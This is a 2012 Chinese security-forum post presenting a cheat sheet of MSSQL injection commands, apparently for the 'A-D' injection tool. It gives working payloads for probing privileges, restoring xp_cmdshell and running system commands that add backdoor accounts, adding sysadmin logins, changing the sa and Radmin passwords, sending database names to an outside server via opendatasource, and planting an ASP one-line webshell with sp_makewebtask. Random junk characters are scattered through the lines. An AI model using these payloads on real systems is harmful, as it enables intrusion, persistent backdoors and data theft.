找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1756|回复: 0
打印 上一主题 下一主题

阿D常用的一些注入命令

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:26:30 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
阿D常用的一些注入命令( l2 B5 _  C4 }! d8 ?! ?6 l
//看看是什么权限的" s: E1 }/ X: J7 I, U  N
and 1=(Select IS_MEMBER('db_owner'))
1 u  V& G- B# P  S5 S, ?& {And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
3 V5 U; n4 L" D" m: f( ?9 _
6 J$ j# J- ?8 T//检测是否有读取某数据库的权限
. f6 w  r+ w; ~$ Aand 1= (Select HAS_DBACCESS('master'))+ Z) w2 j+ S) ~4 E: @  ~4 t
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --% T' w8 X) N7 l# t' y

" w5 r: y8 `/ }. U# y" x5 i8 }9 o# d' z% r
数字类型
" F7 F% y1 [, @* U/ ~and char(124)%2Buser%2Bchar(124)=0! A/ F1 ^% N$ d* n) V4 c( \8 F

6 U0 V' T" D( A4 M' r2 i9 J5 E字符类型, u! e, t6 w; M7 e# L
' and char(124)%2Buser%2Bchar(124)=0 and ''='. D# X; U; X1 N" D. @

& h5 [; q5 s( I  R4 }6 H搜索类型. y- |4 h7 F- v0 z. O8 e; V
' and char(124)%2Buser%2Bchar(124)=0 and '%'='0 f8 L, \4 b% U* c

+ Y! m, {5 G% z+ W. M爆用户名3 v' z) G0 U8 W+ f2 ?
and user>06 P7 S( M9 E5 _: W1 G4 L2 ?9 X4 c, \8 Q
' and user>0 and ''='& x5 \% T9 ?3 C4 l2 V$ N$ Z  N

9 K& M* _- g7 `0 G: D4 P9 j检测是否为SA权限
: ]0 G) N  P8 {7 s% a. p* `. A8 h: jand 1=(select IS_SRVROLEMEMBER('sysadmin'));--
* g  \; d0 Z- J0 {) @& P0 gAnd char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --8 n# Q# i9 h8 T. }

5 h8 Z3 h  C  i' f7 B% R1 x检测是不是MSSQL数据库
% k( A* l1 m) m/ c$ A" dand exists (select * from sysobjects);-- " D% t# x+ H, a0 J0 s3 l$ c

: z2 ^2 ?# Q, |( r" X0 @* {检测是否支持多行+ D- l" P( X4 q$ k4 y( b9 G
;declare @d int;--
- i) A# Q% m7 _% R5 C) F+ I1 F6 Y& ~& P
恢复 xp_cmdshell
6 Q7 f+ i( C# h# S- K# b+ e2 u: [;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
! a5 x  T! {6 ?# B6 e
/ L; t  M& e$ c0 M2 `
: e& r/ ]& v1 L2 D, O+ `2 Pselect * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
. P& b: a$ r7 T: |' W" S. }: E) _2 T
//-----------------------
" q# U2 J4 q# o4 A9 F//      执行命令4 t  P! \0 B; |2 A, C+ o0 g
//-----------------------+ E: N5 V1 J# s- x+ \: A/ {
首先开启沙盘模式:
. S6 V; h. n- ]' }# jexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1& V/ h. c7 k7 Q, ~) b& @& T
! J5 _" _/ [- h# x# I# G/ T
然后利用jet.oledb执行系统命令
7 T9 }; h, D' r8 }( Z: B9 Qselect * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')( g* {* [& I' \: k: E+ O
2 _! G; d. f5 M) O: c, C1 k
执行命令9 h6 K/ @. N) ~/ r8 i4 |2 d. D- c
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
" }* A% I* ~, O4 g. v3 m: Q+ u0 Z$ ~/ U: ]! B
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'0 D5 B6 K( O& y2 e
; J+ C% l% t) a3 [6 a
判断xp_cmdshell扩展存储过程是否存在:
' v3 S5 f; G7 C4 K, r: O! Lhttp://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')1 i$ \: m# C: x8 R; L
+ x3 O" u/ j. x4 b
写注册表
, k% ~" k% F* m; f% c$ }exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
0 q8 K  c4 S2 i/ K  w& \' N. d5 Y3 x3 t. W! {+ [2 n- U5 W, j3 X
REG_SZ
2 m, b7 y7 p; S. T  I- C# z4 K9 b3 J  w. ]9 v2 S& U4 P# Z
读注册表% S9 [3 C" [+ J" Q
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
+ j/ n) P9 I8 V+ w* f: z1 I) H
9 _5 p# q& G. Y7 p5 Q' P读取目录内容
* p* u  O5 F* c; V- k4 Fexec master..xp_dirtree 'c:\winnt\system32\',1,1) P9 o: |8 l$ \0 r# q% H. K
" W% y0 [- Y. ]6 @& y( Z# @6 K
4 {: _# j( H- P( q) s- l- f) l4 W
数据库备份
) g6 F% \! B3 L8 [: e, y( E! lbackup database pubs to disk = 'c:\123.bak'3 p5 U1 X) x. U( l1 Y

" }6 H2 G$ D$ P7 y1 F//爆出长度0 e+ o0 a* r2 V1 R6 F
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
4 ?2 Y! t( N7 Z& V( c/ @
5 E9 T0 _) ^& n+ p3 W; I2 z4 y. [+ U
$ \2 x& o* f- `1 Q' q  O2 J
更改sa口令方法:用sql综合利用工具连接后,执行命令:2 P- \& |! S+ W5 B' X
exec sp_password NULL,'新密码','sa'
# l3 C2 s% `! u* n
6 `8 R6 N( b6 }" s添加和删除一个SA权限的用户test:
1 f+ M5 }. l5 Lexec master.dbo.sp_addlogin test,ptlove4 Z0 O; @6 h5 s7 m/ v0 ?. b$ z' q) y2 N
exec master.dbo.sp_addsrvrolemember test,sysadmin9 L9 y& n1 h, |7 R* s

/ x1 R6 X/ R2 @5 r3 M0 v# `删除扩展存储过过程xp_cmdshell的语句: 3 S/ G7 V! O2 X: j
exec sp_dropextendedproc 'xp_cmdshell'
* J9 v' L. U$ D* K' s2 u# \+ j+ Y  \) y7 i  ~  v
添加扩展存储过过程# m( c: S3 Q" t. c
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll' - z* f2 z' B* V6 c: ]
GRANT exec On xp_proxiedadata TO public
; [* k& i+ v( Q- t! t) n
1 ?. {- u- z5 W) @9 g
4 h0 A4 C- D! N4 k" J# e5 i停掉或激活某个服务。 0 |- w: o; z* s  ?
% B8 v+ r  w$ P. H" b
exec master..xp_servicecontrol 'stop','schedule'
7 Z' e/ a% I5 O$ _, t# u5 ^9 Lexec master..xp_servicecontrol 'start','schedule'4 F3 p) l2 C# k! U0 p
) l) a( J8 h* y
dbo.xp_subdirs3 L$ H7 Y, i" T
* L/ ]' _, F) W% q6 j9 w& O
只列某个目录下的子目录。: G- A% f; V3 ?
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'
5 p& S6 b: M2 S6 X8 D
) _3 _8 L. I' p8 [7 e5 C  tdbo.xp_makecab
, _, h0 v- E. u( w6 e# A+ u, e9 E  S
将目标多个档案压缩到某个目标档案之内。8 P0 t$ q+ N% s) ?
所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。3 p  L8 B" w4 F

+ ^' E4 l: c  _. g- N# \dbo.xp_makecab
- w' I2 q, C4 C'c:\test.cab','mszip',1,
- J, {7 v9 U/ V'C:\Inetpub\wwwroot\SQLInject\login.asp',  F9 r& P8 W) l& K% r& I
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'
& @" K8 O" V+ ?
, @! ?9 H' }) p7 K  @5 |3 i4 }xp_terminate_process
( \& T  P$ ]0 C( U! `
4 I8 u% ~9 S8 w, H停掉某个执行中的程序,但赋予的参数是 Process ID。
6 m2 _$ s# s4 U8 Y) `. v3 K: H- l9 s& r8 h利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID! b2 y+ m2 a; `* l: K

/ G  Y$ L( o  j. x' D: H1 y& axp_terminate_process 2484
* b: O+ d- O2 m  e6 ?" D! \) a9 [  F/ a1 {) z
xp_unpackcab
2 W" }0 {- n+ \# W1 m0 h" i2 O7 L
* ^0 q, V/ k" o: g解开压缩档。
3 D3 z) v/ e2 B1 t, M$ ~8 C8 _7 |6 ^( x* B4 |" p
xp_unpackcab 'c:\test.cab','c:\temp',15 v3 {  ?5 L( t; I. O8 G
) ~, ?% I( r$ P8 R6 `9 x) ?3 ~

, [0 v) q5 u" K3 l: B5 T某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为12349 H6 y) _0 V1 g) O6 q5 [$ j8 e
7 K* Y; {! T& P1 R5 a% ^/ P, e
create database lcx;
( r& O& ]% k1 w+ U( Q* i7 PCreate TABLE ku(name nvarchar(256) null);. n% ]& o$ Z) Y6 c
Create TABLE biao(id int NULL,name nvarchar(256) null);
; X. d" N7 u- J3 e) B4 m+ U, c: k1 i
//得到数据库名
% d$ l  x) B8 k& `/ x  hinsert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases! n2 x7 z  z6 H
; L: D1 E  ^/ i$ B& Y5 ?
4 X/ A& p. S0 ^( h3 S9 Q+ u
//在Master中创建表,看看权限怎样
" x- @% m- Q! [1 i1 BCreate TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
- Y; \  r! O3 [) k. j+ e% Y4 h
: B% O# g" s2 C4 V用 sp_makewebtask直接在web目录里写入一句话马:
. u( d: {: n6 Yhttp://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--( ~# x% ?5 C. H! s+ I

, I$ M4 Y# X5 }, g//更新表内容! a" P0 E; B9 \* G1 u1 n& Q
Update films SET kind = 'Dramatic' Where id = 1230 E9 y' X2 Y7 c! x2 S

% O: z5 F& C6 }2 M//删除内容1 p5 o, p7 I, K* m5 k
delete from table_name where Stockid = 3
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表